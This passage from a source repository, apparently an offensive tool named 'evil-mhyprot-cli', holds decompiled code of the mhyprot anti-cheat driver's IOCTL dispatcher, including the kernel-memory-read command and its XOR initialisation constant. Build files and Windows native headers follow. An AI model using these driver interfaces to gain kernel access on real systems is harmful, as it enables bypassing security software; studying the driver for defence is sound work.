 20 |   uint local_res10 [2];
 21 |   ulonglong *local_res18;
 22 |   undefined8 local_198 [48];
 23 |   
 24 |   lVar7 = *(longlong *)(param_2 + 0xb8);
 25 |   puVar4 = *(ulonglong **)(param_2 + 0x18);
 26 |   uVar1 = *(uint *)(lVar7 + 0x18);
 27 |   uVar2 = *(uint *)(lVar7 + 0x10);
 28 |   uVar3 = *(uint *)(lVar7 + 8);
 29 |   uVar10 = (ulonglong)uVar3;
 30 |   *(undefined8 *)(param_2 + 0x38) = 0;
 31 |   if (uVar1 == 0x80104000) {
 32 |     uVar6 = FUN_000121ec((longlong)puVar4,uVar2);
 33 |     _DAT_0001a110 = (int)uVar6;
 34 |     *(uint *)puVar4 = -(uint)(_DAT_0001a110 != 0) & 1;
 35 | LAB_0001d75c:
 36 |     uVar10 = 4;
 37 |     goto LAB_0001da4f;
 38 |   }
 39 |   if (((uVar1 + 0x7feec000 & 0xfffcffff) == 0) && (uVar1 != 0x80134000)) goto LAB_0001da4f;
 40 |   if (uVar1 == 0x80134000) {
 41 |     lVar7 = FUN_00012314();
 42 |     *(int *)puVar4 = (int)lVar7;
 43 |     goto LAB_0001d75c;
 44 |   }
 45 |   if (uVar1 == 0x82054000) {
 46 |     uVar8 = FUN_000126d0(*(uint *)puVar4,(longlong)(uint *)((longlong)puVar4 + 4),
 47 |                          *(uint *)((longlong)puVar4 + 4));
 48 |     iVar5 = (int)uVar8;
 49 |   }
 50 |   else {
 51 |     if (uVar1 == 0x83024000) {
 52 |       uVar8 = FUN_000162ec((longlong)puVar4 + 4,(int *)puVar4);
 53 |       iVar5 = (int)uVar8;
 54 |     }
 55 |     else {
 56 |       if (uVar1 == 0x83074000) {
 57 |         uVar6 = FUN_00015f18();
 58 |         iVar5 = (int)uVar6;
 59 |       }
 60 |       else {
 61 |                     /* MHYPROT_IOCTL_READ_KERNEL_MEMORY */
 62 |         if (uVar1 != 0x83064000) {
 63 |           if (uVar1 == 0x82074000) {
 64 |             if (((uVar2 < 4) || (uVar3 < 0x38)) || (puVar4 == (ulonglong *)0x0)) goto LAB_0001da4f;
 65 |             puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
 66 |             *puVar9 = SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 8) >> 0x45,0) &
 67 |                       0xffffffff;
 68 |             uVar8 = FUN_000132b0((uint *)puVar4,puVar9);
 69 |             *(int *)(param_2 + 0x30) = (int)uVar8;
 70 |             if ((int)uVar8 < 0) {
 71 |               uVar10 = 8;
 72 |               *puVar4 = *puVar9;
 73 |             }
 74 |             else {
 75 |               uVar8 = *puVar9 * 0x30 + 8;
 76 | LAB_0001d842:
 77 |               *(ulonglong *)(param_2 + 0x38) = uVar8;
 78 |               FUN_000175c0(puVar4,puVar9,uVar8);
 79 |             }
 80 | LAB_0001d85b:
 81 |             uVar6 = 0x4746544d;
 82 |           }
 83 |           else {
 84 |             if (uVar1 == 0x82104000) {
 85 |               if (((uVar2 < 0x28) || (uVar3 < 0x20)) || (puVar4 == (ulonglong *)0x0))
 86 |               goto LAB_0001da4f;
 87 |               puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
 88 |               *(int *)puVar9 =
 89 |                    (int)SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 4) >> 0x44,0);
 90 |               uVar6 = FUN_0001377c((longlong)puVar4,(uint *)puVar9);
 91 |               *(int *)(param_2 + 0x30) = (int)uVar6;
 92 |               if (-1 < (int)uVar6) {
 93 |                 uVar8 = (ulonglong)*(uint *)puVar9 * 0x18 + 4;
 94 |                 goto LAB_0001d842;
 95 |               }
 96 |               uVar10 = 4;
 97 |               *(uint *)puVar4 = *(uint *)puVar9;
 98 |               goto LAB_0001d85b;
 99 |             }
100 |             if (uVar1 == 0x82094000) {
101 |               *(undefined4 *)puVar4 = 0;
102 |               goto LAB_0001da4f;
103 |             }
104 |                     /* MHYPROT_IOCTL_INITIALIZE */
105 |             if (uVar1 == 0x80034000) {
106 |               if (uVar2 == 0x10) {
107 |                 puVar4[1] = puVar4[1] ^ 0xebbaaef4fff89042;
108 |                 *puVar4 = *puVar4 ^ puVar4[1];
109 |                 if (*(int *)((longlong)puVar4 + 4) == -0x45145114) {
110 |                   FUN_000151a8(*(undefined4 *)puVar4);
111 |                   if ((int)DAT_0001a108 == 0) {
112 |                     FUN_0001301c((longlong *)&DAT_0001a0e8,puVar4[1]);
113 |                     lVar7 = 7;
114 |                     do {
115 |                       uVar10 = FUN_00012eb0((uint **)&DAT_0001a0e8);
116 |                       *puVar4 = uVar10;
117 |                       DAT_0001a108._0_4_ = 1;
118 |                       lVar7 = lVar7 + -1;
119 |                     } while (lVar7 != 0);
120 |                     uVar10 = 8;
121 |                   }
122 |                   else {
123 |                     uVar10 = 0;
124 |                   }
125 |                 }
126 |               }
127 |               goto LAB_0001da4f;
128 |             }
129 |             if (uVar1 == 0x81134000) goto LAB_0001da4f;
130 |             if (uVar1 == 0x81144000) {
131 |               uVar10 = FUN_00016654(*(uint *)puVar4,(longlong)local_198);
132 |               iVar5 = (int)uVar10;
133 |               if (-1 < iVar5) {
134 |                 uVar10 = (ulonglong)(uint)(iVar5 * 0x18);
135 |                 if (0 < iVar5) {
136 |                   FUN_000175c0(puVar4,local_198,(longlong)iVar5 * 0x18);
137 |                 }
138 |                 goto LAB_0001da4f;
139 |               }
140 |               uVar10 = 4;
141 |               goto LAB_0001d7c1;
142 |             }
143 |             local_res18 = (ulonglong *)0x0;
144 |             local_res10[0] = 0;
145 |             uVar8 = IOCTL_FUN_0001d000(uVar1,puVar4,uVar2,&local_res18,(int *)local_res10);
146 |             puVar9 = local_res18;
147 |             if ((char)uVar8 == '\0') goto LAB_0001da4f;
148 |             if (uVar3 < local_res10[0]) {
149 |               local_res10[0] = uVar3;
150 |             }
151 |             if ((local_res18 == (ulonglong *)0x0) || (local_res10[0] == 0)) goto LAB_0001da4f;
152 |             uVar10 = (ulonglong)local_res10[0];
153 |             FUN_000175c0(puVar4,local_res18,(ulonglong)local_res10[0]);
154 |             uVar6 = 0;
155 |           }
156 |           ExFreePoolWithTag(puVar9,uVar6);
157 |           goto LAB_0001da4f;
158 |         }
159 |         uVar6 = FUN_000163a8((undefined4 *)((longlong)puVar4 + 4),*puVar4,*(uint *)(puVar4 + 1));
160 |         iVar5 = (int)uVar6;
161 |       }
162 |     }
163 |   }
164 | LAB_0001d7c1:
165 |   *(int *)puVar4 = iVar5;
166 | LAB_0001da4f:
167 |   *(ulonglong *)(param_2 + 0x38) = uVar10;
168 |   *(undefined4 *)(param_2 + 0x30) = 0;
169 |   IofCompleteRequest(param_2,0);
170 |   return 0;
171 | }
172 | 


--------------------------------------------------------------------------------
/src/nt.hpp:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include <Windows.h>
  3 | 
  4 | //
  5 | // windows native definitions
  6 | //
  7 | 
  8 | #ifndef NT_SUCCESS
  9 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
 10 | #endif
 11 | 
 12 | #define STATUS_SUCCESS                   ((NTSTATUS)0x00000000L)
 13 | #define STATUS_UNSUCCESSFUL              ((NTSTATUS)0xC0000001L)
 14 | #define STATUS_NOT_IMPLEMENTED           ((NTSTATUS)0xC0000002L)
 15 | #define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)
 16 | #define STATUS_INVALID_CID               ((NTSTATUS)0xC000000BL)
 17 | #define STATUS_NO_SUCH_DEVICE            ((NTSTATUS)0xC000000EL)
 18 | #define STATUS_NO_SUCH_FILE              ((NTSTATUS)0xC000000FL)
 19 | #define STATUS_INVALID_DEVICE_REQUEST    ((NTSTATUS)0xC0000010L)
 20 | #define STATUS_MORE_PROCESSING_REQUIRED  ((NTSTATUS)0xC0000016L)
 21 | #define STATUS_CONFLICTING_ADDRESSES     ((NTSTATUS)0xC0000018L)
 22 | #define STATUS_NO_MORE_ENTRIES           ((NTSTATUS)0x8000001AL)
 23 | #define STATUS_BUFFER_TOO_SMALL          ((NTSTATUS)0xC0000023L)
 24 | #define STATUS_INVALID_PAGE_PROTECTION   ((NTSTATUS)0xC0000045L)
 25 | #define STATUS_PROCEDURE_NOT_FOUND       ((NTSTATUS)0xC000007AL)
 26 | #define STATUS_INSUFFICIENT_RESOURCES    ((NTSTATUS)0xC000009AL)
 27 | #define STATUS_INSTRUCTION_MISALIGNMENT  ((NTSTATUS)0xC00000AAL)
 28 | #define STATUS_INTERNAL_ERROR            ((NTSTATUS)0xC00000E5L)
 29 | #define STATUS_INVALID_PARAMETER_1       ((NTSTATUS)0xC00000EFL)
 30 | #define STATUS_INVALID_PARAMETER_2       ((NTSTATUS)0xC00000F0L)
 31 | #define STATUS_INVALID_PARAMETER_3       ((NTSTATUS)0xC00000F1L)
 32 | #define STATUS_INVALID_PARAMETER_4       ((NTSTATUS)0xC00000F2L)
 33 | #define STATUS_INVALID_PARAMETER_5       ((NTSTATUS)0xC00000F3L)
 34 | #define STATUS_INVALID_PARAMETER_6       ((NTSTATUS)0xC00000F4L)
 35 | #define STATUS_INVALID_PARAMETER_7       ((NTSTATUS)0xC00000F5L)
 36 | #define STATUS_INVALID_PARAMETER_8       ((NTSTATUS)0xC00000F6L)
 37 | #define STATUS_INVALID_PARAMETER_9       ((NTSTATUS)0xC00000F7L)
 38 | #define STATUS_INVALID_PARAMETER_10      ((NTSTATUS)0xC00000F8L)
 39 | #define STATUS_INVALID_PARAMETER_11      ((NTSTATUS)0xC00000F9L)
 40 | #define STATUS_INVALID_PARAMETER_12      ((NTSTATUS)0xC00000FAL)
 41 | #define STATUS_INVALID_ADDRESS           ((NTSTATUS)0xC0000141L)
 42 | #define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
 43 | 
 44 | typedef enum _SYSTEM_INFORMATION_CLASS
 45 | {
 46 |     SystemBasicInformation                  = 0,
 47 |     SystemProcessorInformation              = 1,
 48 |     SystemPerformanceInformation            = 2,
 49 |     SystemTimeOfDayInformation              = 3,
 50 |     SystemPathInformation                   = 4,
 51 |     SystemProcessInformation                = 5,
 52 |     SystemCallCountInformation              = 6,
 53 |     SystemDeviceInformation                 = 7,
 54 |     SystemProcessorPerformanceInformation   = 8,
 55 |     SystemFlagsInformation                  = 9,
 56 |     SystemCallTimeInformation               = 10,
 57 |     SystemModuleInformation                 = 11,
 58 |     SystemLocksInformation                  = 12,
 59 |     SystemStackTraceInformation             = 13,
 60 |     SystemPagedPoolInformation              = 14,
 61 |     SystemNonPagedPoolInformation           = 15,
 62 |     SystemHandleInformation                 = 16,
 63 |     SystemObjectInformation                 = 17,
 64 |     SystemPageFileInformation               = 18,
 65 |     SystemVdmInstemulInformation            = 19,
 66 |     SystemVdmBopInformation                 = 20,
 67 |     SystemFileCacheInformation              = 21,
 68 |     SystemPoolTagInformation                = 22,
 69 |     SystemInterruptInformation              = 23,
 70 |     SystemDpcBehaviorInformation            = 24,
 71 |     SystemFullMemoryInformation             = 25,
 72 |     SystemLoadGdiDriverInformation          = 26,
 73 |     SystemUnloadGdiDriverInformation        = 27,
 74 |     SystemTimeAdjustmentInformation         = 28,
 75 |     SystemSummaryMemoryInformation          = 29,
 76 |     SystemMirrorMemoryInformation           = 30,
 77 |     SystemPerformanceTraceInformation       = 31,
 78 |     SystemObsolete0                         = 32,
 79 |     SystemExceptionInformation              = 33,
 80 |     SystemCrashDumpStateInformation         = 34,
 81 |     SystemKernelDebuggerInformation         = 35,
 82 |     SystemContextSwitchInformation          = 36,
 83 |     SystemRegistryQuotaInformation          = 37,
 84 |     SystemExtendServiceTableInformation     = 38,
 85 |     SystemPrioritySeperation                = 39,
 86 |     SystemVerifierAddDriverInformation      = 40,
 87 |     SystemVerifierRemoveDriverInformation   = 41,
 88 |     SystemProcessorIdleInformation          = 42,
 89 |     SystemLegacyDriverInformation           = 43,
 90 |     SystemCurrentTimeZoneInformation        = 44,
 91 |     SystemLookasideInformation              = 45,
 92 |     SystemTimeSlipNotification              = 46,
 93 |     SystemSessionCreate                     = 47,
 94 |     SystemSessionDetach                     = 48,
 95 |     SystemSessionInformation                = 49,
 96 |     SystemRangeStartInformation             = 50,
 97 |     SystemVerifierInformation               = 51,
 98 |     SystemVerifierThunkExtend               = 52,
 99 |     SystemSessionProcessInformation         = 53,
100 |     SystemLoadGdiDriverInSystemSpace        = 54,
101 |     SystemNumaProcessorMap                  = 55,
102 |     SystemPrefetcherInformation             = 56,
103 |     SystemExtendedProcessInformation        = 57,
104 |     SystemRecommendedSharedDataAlignment    = 58,
105 |     SystemComPlusPackage                    = 59,
106 |     SystemNumaAvailableMemory               = 60,
107 |     SystemProcessorPowerInformation         = 61,
108 |     SystemEmulationBasicInformation         = 62,
109 |     SystemEmulationProcessorInformation     = 63,
110 |     SystemExtendedHandleInformation         = 64,
111 |     SystemLostDelayedWriteInformation       = 65,
112 |     SystemBigPoolInformation                = 66,
113 |     SystemSessionPoolTagInformation         = 67,
114 |     SystemSessionMappedViewInformation      = 68,
115 |     SystemHotpatchInformation               = 69,
116 |     SystemObjectSecurityMode                = 70,
117 |     SystemWatchdogTimerHandler              = 71,
118 |     SystemWatchdogTimerInformation          = 72,
119 |     SystemLogicalProcessorInformation       = 73,
120 |     SystemWow64SharedInformation            = 74,
121 |     SystemRegisterFirmwareTableInformationHandler = 75,
122 |     SystemFirmwareTableInformation          = 76,
123 |     SystemModuleInformationEx               = 77,
124 |     SystemVerifierTriageInformation         = 78,
125 |     SystemSuperfetchInformation             = 79,
126 |     SystemMemoryListInformation             = 80,
127 |     SystemFileCacheInformationEx            = 81,
128 |     MaxSystemInfoClass                      = 82
129 | } SYSTEM_INFORMATION_CLASS;
130 | 
131 | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
132 | {
133 |     ULONG Unknow1;
134 |     ULONG Unknow2;
135 |     ULONG Unknow3;
136 |     ULONG Unknow4;
137 |     PVOID DllBase;
138 |     ULONG Size;
139 |     ULONG Flags;
140 |     USHORT Index;
141 |     USHORT NameLength;
142 |     USHORT LoadCount;
143 |     USHORT ModuleNameOffset;
144 |     char ImageName[256];
145 | } SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
146 | 
147 | typedef struct _SYSTEM_MODULE_INFORMATION
148 | {
149 |     ULONG Count;
150 |     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
151 | } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
152 | 
153 | typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(
154 |     IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
155 |     OUT PVOID                   SystemInformation,
156 |     IN ULONG                    SystemInformationLength,
157 |     OUT PULONG                  ReturnLength
158 | );
159 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | [Ll]ogs/
 33 | 
 34 | # Visual Studio 2015/2017 cache/options directory
 35 | .vs/
 36 | # Uncomment if you have tasks that create the project's static files in wwwroot
 37 | #wwwroot/
 38 | 
 39 | # Visual Studio 2017 auto generated files
 40 | Generated\ Files/
 41 | 
 42 | # MSTest test Results
 43 | [Tt]est[Rr]esult*/
 44 | [Bb]uild[Ll]og.*
 45 | 
 46 | # NUnit
 47 | *.VisualState.xml
 48 | TestResult.xml
 49 | nunit-*.xml
 50 | 
 51 | # Build Results of an ATL Project
 52 | [Dd]ebugPS/
 53 | [Rr]eleasePS/
 54 | dlldata.c
 55 | 
 56 | # Benchmark Results
 57 | BenchmarkDotNet.Artifacts/
 58 | 
 59 | # .NET Core
 60 | project.lock.json
 61 | project.fragment.lock.json
 62 | artifacts/
 63 | 
 64 | # StyleCop
 65 | StyleCopReport.xml
 66 | 
 67 | # Files built by Visual Studio
 68 | *_i.c
 69 | *_p.c
 70 | *_h.h
 71 | *.ilk
 72 | *.meta
 73 | *.obj
 74 | *.iobj
 75 | *.pch
 76 | *.pdb
 77 | *.ipdb
 78 | *.pgc
 79 | *.pgd
 80 | *.rsp
 81 | *.sbr
 82 | *.tlb
 83 | *.tli
 84 | *.tlh
 85 | *.tmp
 86 | *.tmp_proj
 87 | *_wpftmp.csproj
 88 | *.log
 89 | *.vspscc
 90 | *.vssscc
 91 | .builds
 92 | *.pidb
 93 | *.svclog
 94 | *.scc
 95 | 
 96 | # Chutzpah Test files
 97 | _Chutzpah*
 98 | 
 99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 | 
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 | 
116 | # Visual Studio Trace Files
117 | *.e2e
118 | 
119 | # TFS 2012 Local Workspace
120 | $tf/
121 | 
122 | # Guidance Automation Toolkit
123 | *.gpState
124 | 
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 | 
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 | 
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 | 
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 | 
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 | 
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 | 
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 | 
153 | # Web workbench (sass)
154 | .sass-cache/
155 | 
156 | # Installshield output folder
157 | [Ee]xpress/
158 | 
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 | 
169 | # Click-Once directory
170 | publish/
171 | 
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 | 
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 | 
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 | 
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 | 
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 | 
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 | 
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 | 
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 | 
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 | 
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 | 
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 | 
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 | 
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 | 
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 | 
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 | 
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 | 
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 | 
278 | # Visual Studio 6 build log
279 | *.plg
280 | 
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 | 
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 | 
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 | 
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 | 
299 | # FAKE - F# Make
300 | .fake/
301 | 
302 | # CodeRush personal settings
303 | .cr/personal
304 | 
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 | 
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 | 
313 | # Tabs Studio
314 | *.tss
315 | 
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 | 
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 | 
325 | # OpenCover UI analysis results
326 | OpenCover/
327 | 
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 | 
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 | 
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 | 
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 | 
340 | # Local History for Visual Studio
341 | .localhistory/
342 | 
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 | 
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 | 
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 | 
352 | libmhyprot-src/*.cpp
353 | libmhyprot-src/*.hpp
354 | libmhyprot-src/*.h
355 | libmhyprot-src/*.vcxproj
356 | libmhyprot-src/*.vcxproj.filters
357 | 
358 | tests/*.cpp
359 | tests/*.hpp
360 | tests/*.h
361 | tests/*.vcxproj
362 | tests/*.vcxproj.filters
363 | 
364 | evil-mhyrot-cli.sln


--------------------------------------------------------------------------------
/src/evil-mhyprot-cli.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{0d17a4b4-a7c4-49c0-99e3-b856f9f3b271}</ProjectGuid>
 25 |     <RootNamespace>mhyprotrootkit</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>evil-mhyprot-cli</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>Application</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v142</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v142</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v142</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v142</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>MultiByte</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |     <TargetName>$(ProjectName)64</TargetName>
 86 |   </PropertyGroup>
 87 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 88 |     <ClCompile>
 89 |       <WarningLevel>Level3</WarningLevel>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
